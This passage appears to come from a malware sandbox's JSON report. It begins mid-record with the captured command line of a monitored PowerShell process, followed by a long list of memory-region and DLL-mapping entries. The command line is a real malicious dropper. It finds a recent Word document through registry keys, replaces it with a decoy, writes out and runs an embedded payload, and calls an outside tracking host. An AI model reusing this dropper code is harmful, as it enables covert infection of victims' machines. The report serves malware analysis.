pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri 
-Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_9", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 9, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000009-region_00001315-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1315", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:07.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 
212991, "entry_point": 0, "filename": null, "id": "region_1316", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:07.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1317", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:07.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1318", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:07.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1319", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:07.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1320", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:07.656", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001321-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1321", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:07.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5358419968, "type": "region", "version": 1 }, "end_va": 5358907391, "entry_point": 5358470716, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_1322", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5358419968, "timestamp": "00:01:07.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": 
"No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1323", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:07.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1324", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:07.658", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001325-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1325", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:01:07.659", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001326-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", 
"permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1326", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:01:07.659", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001340-addr_0x0000000000220000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_212", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_1340", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:01:07.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1341", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:07.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": 
null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1342", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:07.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1375", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1376", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1377", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", 
"region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1378", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1379", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 929791, "entry_point": 917504, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_1380", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:01:07.955", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000009-region_00001381-addr_0x0000000000170000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_1381", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:07.976", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001382-addr_0x0000000000180000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_1382", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:07.976", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001383-addr_0x0000000000200000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_1383", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:07.977", "type": "region", "version": 1 }, { 
"dump": { "filename": "process_00000009-region_00001384-addr_0x0000000000320000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_225", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_1384", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:01:07.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5931007, "entry_point": 0, "filename": null, "id": "region_1385", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:07.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 7540735, "entry_point": 0, "filename": null, "id": "region_1386", "name": "pagefile_0x00000000005b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5963776, "timestamp": "00:01:07.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size 
surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 28573695, "entry_point": 0, "filename": null, "id": "region_1387", "name": "pagefile_0x0000000000740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7602176, "timestamp": "00:01:07.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1388", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:07.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1389", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:07.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1390", 
"name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:07.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555903796, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_1391", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:01:07.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791729963008, "type": "region", "version": 1 }, "end_va": 8791730065407, "entry_point": 8791729963008, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1392", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791729963008, "timestamp": "00:01:07.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1393", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:07.993", "type": "region", "version": 1 }, 
{ "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1394", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:07.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1395", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:07.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1396", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:07.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1397", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:07.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1398", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:07.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1399", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:07.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": 
"\\Windows\\System32\\msctf.dll", "id": "region_1400", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:07.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1401", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:07.998", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1402", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:07.998", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1403", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 
8791791566848, "timestamp": "00:01:07.999", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1404", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:08.000", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001448-addr_0x00000000001d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_231", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_1448", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:01:08.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001449-addr_0x0000000001b40000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_232", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28573696, "type": "region", "version": 1 }, "end_va": 29622271, "entry_point": 0, 
"filename": null, "id": "region_1449", "name": "private_0x0000000001b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 28573696, "timestamp": "00:01:08.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001450-addr_0x0000000001da0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_233", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31588351, "entry_point": 0, "filename": null, "id": "region_1450", "name": "private_0x0000000001da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31064064, "timestamp": "00:01:08.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1451", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:08.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", 
"id": "region_1452", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:08.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1642495, "entry_point": 0, "filename": null, "id": "region_1457", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:01:08.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_1458", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:01:08.186", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001459-addr_0x0000000001cf0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_237", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30343168, "type": "region", "version": 1 }, "end_va": 30867455, "entry_point": 0, "filename": null, "id": "region_1459", "name": "private_0x0000000001cf0000", "norm_filename": null, 
